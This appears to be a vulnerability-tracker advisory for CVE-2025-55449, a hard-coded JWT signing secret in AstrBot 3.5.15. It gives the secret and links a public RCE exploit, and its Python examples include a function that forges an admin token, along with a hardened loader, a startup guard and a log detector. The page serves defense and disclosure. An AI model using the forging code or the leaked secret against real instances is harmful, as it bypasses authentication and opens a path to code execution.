
AstrBot CVE-2025-55449

Severity: HIGH (CVSS 3.1 base score 7.3)
Weakness: Use of Hard-coded Cryptographic Key (CWE-321)
Published: 2026-05-08 (source: mitre); advisory GHSA-4m32-cjv7-f425

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: Low
Availability: Low

Lifecycle Timeline

Analysis Generated: May 08, 2026 18:22 (vuln.today)
CVSS changed: May 08, 2026 18:22 (NVD), now 7.3 (HIGH)
CVE Published: May 08, 2026 00:00 (NVD), rated HIGH 7.3
CVE Published: May 08, 2026 00:00 (NVD), no severity yet (UNKNOWN)

Description (NVD)

AstrBotDevs AstrBot 3.5.15 has Advanced_System_for_Text_Response_and_Bot_Operations_Tool as the hard-coded private key used to sign a JWT.

Analysis (AI)

An unauthenticated remote attacker can forge AstrBot 3.5.15 authentication tokens because the JWT signing secret ('Advanced_System_for_Text_Response_and_Bot_Operations_Tool') is hard-coded in the source and therefore public. A forged token bypasses authentication outright, and public exploit code (Marven11/CVE-2025-55449-AstrBot-RCE on GitHub) chains the forged token into remote code execution. The NVD vector rates confidentiality, integrity and availability impact as Low, which does not reflect an authentication bypass that leads to code execution; treat 7.3 as a floor rather than a ceiling. The EPSS score of 0.00% indicates a low predicted probability of exploitation in the wild at the time of analysis, but a working public RCE exploit means any internet-exposed instance should be treated as trivially exploitable.

Technical Context (AI)

This vulnerability is CWE-321 (Use of Hard-coded Cryptographic Key) in AstrBot's JWT handling. A JWT is authenticated by its signature: the server signs the header and payload when it issues a token and recomputes the signature on every later request, so whoever holds the signing key decides which tokens are valid. The NVD text calls the value a private key, but a fixed passphrase like 'Advanced_System_for_Text_Response_and_Bot_Operations_Tool' is the shared secret of an HMAC-signed (HS-family) JWT, and because it is embedded in the source code every AstrBot 3.5.15 installation uses the same one. Anyone who reads it from the public codebase can mint tokens with arbitrary identity, role or permission claims that the server accepts as genuine, with no brute force, no user interaction and no prior access. The bot framework most likely uses these tokens for its web API and administrative interface, so forged tokens yield privileged access; the public RCE exploit indicates that the reachable privileged functions include ones that execute system commands.
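The mechanics above, as an added example that is not AstrBot's own code: a stdlib-only HS256 mint/verify pair, an attacker-side forge using the secret named in the advisory, and a hardened secret loader. The claim names (username, role, exp) and the JWT_SECRET environment variable are assumptions chosen for illustration, not AstrBot's real token layout or configuration.

```python
"""Why a hard-coded HS256 secret is a full authentication bypass.

Added example, not AstrBot code. DEFAULT_SECRET is the value the advisory
reports; claim names and the JWT_SECRET variable are assumptions.
"""
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Optional

# The value the advisory reports as AstrBot 3.5.15's hard-coded JWT secret.
DEFAULT_SECRET = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def jwt_encode(payload: dict, secret: str) -> str:
    """Sign header.payload with HMAC-SHA256, exactly as an HS256 JWT is built."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = ".".join(
        _b64url_encode(json.dumps(part, separators=(",", ":")).encode())
        for part in (header, payload)
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def jwt_verify(token: str, secret: str) -> Optional[dict]:
    """Return the claims if the signature matches `secret` and the token is unexpired, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
    except ValueError:
        return None
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":  # never let the token choose the algorithm
        return None
    expected = hmac.new(
        secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    claims = json.loads(_b64url_decode(payload_b64))
    if claims.get("exp", 0) < time.time():
        return None
    return claims


def forge_admin_token(known_secret: str = DEFAULT_SECRET) -> str:
    """Attacker side: mint an admin token with the secret read from the public source."""
    claims = {"username": "admin", "role": "admin", "exp": int(time.time()) + 3600}
    return jwt_encode(claims, known_secret)


def load_secret(env=os.environ) -> str:
    """Hardened pattern: take the secret from the environment, refuse the leaked default,
    or generate a per-installation random secret when none is configured."""
    value = env.get("JWT_SECRET")
    if value is None:
        return secrets.token_urlsafe(32)
    if value == DEFAULT_SECRET or len(value) < 32:
        raise ValueError("JWT_SECRET is the known default or too short; rotate it")
    return value


def demo() -> tuple:
    """(accepted by the vulnerable verifier, accepted by the hardened verifier)
    for one and the same forged token."""
    forged = forge_admin_token()
    vulnerable = jwt_verify(forged, DEFAULT_SECRET) is not None
    hardened = jwt_verify(forged, load_secret(env={})) is not None
    return vulnerable, hardened


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The verifier pins the algorithm to HS256 before checking the signature, so an attacker cannot downgrade to alg "none" or swap in a different key type; with the secret leaked, however, that check is irrelevant, because the forged token is a perfectly valid HS256 token. Only a secret the attacker does not know (the hardened path) makes it fail.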

Remediation (AI)

The input data reports a vendor patch, but no AstrBot release or repository security advisory explicitly addressing CVE-2025-55449 could be confirmed at the referenced URL; verify any fix against GHSA-4m32-cjv7-f425 and the upstream changelog before relying on it. Whether or not a patched release is installed, the fix that matters is the secret itself: replace the JWT signing secret on every instance with a cryptographically random value of at least 32 bytes, stored outside the code (environment variable, secrets manager or HSM), and confirm after restart that the running configuration no longer carries the default. Rotating the secret invalidates every existing token, forged ones included, which is the intended effect; legitimate users simply log in again. Until the rotation is confirmed, apply compensating controls: restrict network access to the AstrBot instance with IP allowlisting or a VPN, put a reverse proxy in front of it with rate limiting, and monitor authentication logs for the same token arriving from multiple source IPs, tokens with claim structures the application never issues, and tokens whose header names an unexpected algorithm. For high-risk environments, take the service offline until the secret is rotated. Each control has a cost: allowlisting breaks legitimate remote access, rate limiting can slow high-volume bot operations, and shutting the service down removes availability entirely. The exploit repository at https://github.com/Marven11/CVE-2025-55449-AstrBot-RCE documents the request pattern an attack produces and is the right source for detection signatures.
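Two of the controls above in working form, as an added example that is not AstrBot's code: a startup guard that refuses the leaked default (or a weak) secret, and a log check that flags a token reused from several source IPs, a non-HS256 header, or a claim set the application is assumed never to issue. The configuration path dashboard.jwt_secret, the access-log line format, the expected claim set and the sample tokens are all constructed for this example.

```python
"""Startup guard and log detection for a shared-default JWT secret.

Added example, not AstrBot code. Config path, log format, claim shape and the
sample tokens are constructed; DEFAULT_SECRET is the value from the advisory.
"""
import base64
import json
import re
from collections import defaultdict

DEFAULT_SECRET = "Advanced_System_for_Text_Response_and_Bot_Operations_Tool"
EXPECTED_CLAIMS = {"username", "exp"}  # assumed shape of a legitimately issued token


def check_jwt_secret(config: dict) -> str:
    """Refuse to start on the leaked default or a weak secret (config path is assumed)."""
    secret = config.get("dashboard", {}).get("jwt_secret")
    if not secret:
        raise RuntimeError("no jwt_secret configured")
    if secret == DEFAULT_SECRET:
        raise RuntimeError("jwt_secret is the public default from CVE-2025-55449; rotate it")
    if len(secret) < 32:
        raise RuntimeError("jwt_secret shorter than 32 characters")
    return secret


def _b64url_encode(obj: dict) -> str:
    raw = json.dumps(obj, separators=(",", ":")).encode()
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> dict:
    return json.loads(base64.urlsafe_b64decode(text + "=" * (-len(text) % 4)))


def _fake_token(header: dict, claims: dict) -> str:
    """Constructed token for the sample log; the signature is filler because these
    checks never verify it, they only look at reuse and shape."""
    return f"{_b64url_encode(header)}.{_b64url_encode(claims)}.c2ln"


TOKEN_ADMIN = _fake_token({"alg": "HS256", "typ": "JWT"}, {"username": "admin", "exp": 4102444800})
TOKEN_NONE = _fake_token({"alg": "none", "typ": "JWT"}, {"username": "admin", "exp": 4102444800})
TOKEN_ROLE = _fake_token({"alg": "HS256", "typ": "JWT"}, {"username": "x", "role": "admin", "exp": 4102444800})

# Constructed access-log lines: "<src_ip> <method> <path> <status> bearer=<jwt>".
SAMPLE_LOG = [
    "10.0.0.5 GET /api/stat 200 bearer=" + TOKEN_ADMIN,
    "203.0.113.7 GET /api/stat 200 bearer=" + TOKEN_ADMIN,      # same token, second IP
    "198.51.100.9 POST /api/plugin 200 bearer=" + TOKEN_NONE,   # alg "none" header
    "10.0.0.5 GET /api/config 200 bearer=" + TOKEN_ROLE,        # extra "role" claim
]

LINE_RE = re.compile(r"^(?P<ip>\S+) \S+ \S+ \d{3} bearer=(?P<token>[\w-]+\.[\w-]+\.[\w-]*)$")


def find_suspicious_tokens(lines) -> dict:
    """Return tokens seen from more than one IP, with a non-HS256 header, or with
    a claim set different from EXPECTED_CLAIMS."""
    seen_ips = defaultdict(set)
    findings = {"reused": set(), "bad_alg": set(), "unexpected_claims": set()}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, token = m.group("ip"), m.group("token")
        seen_ips[token].add(ip)
        try:
            header, claims = (_b64url_decode(p) for p in token.split(".")[:2])
        except ValueError:  # undecodable header/payload is itself suspicious
            findings["bad_alg"].add(token)
            continue
        if header.get("alg") != "HS256":
            findings["bad_alg"].add(token)
        if set(claims) != EXPECTED_CLAIMS:
            findings["unexpected_claims"].add(token)
    findings["reused"] = {t for t, ips in seen_ips.items() if len(ips) > 1}
    return findings


if __name__ == "__main__":
    for kind, tokens in find_suspicious_tokens(SAMPLE_LOG).items():
        print(kind, len(tokens))
```

The log check deliberately does not verify signatures: on an instance still running the default secret a forged token verifies perfectly, so reuse across IPs and claim shape are the only signals left in the logs. Run the startup guard from the same place the application reads its configuration so a redeploy that silently reintroduces the default fails loudly instead of going live.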

CVE-2025-55449 vulnerability details – vuln.today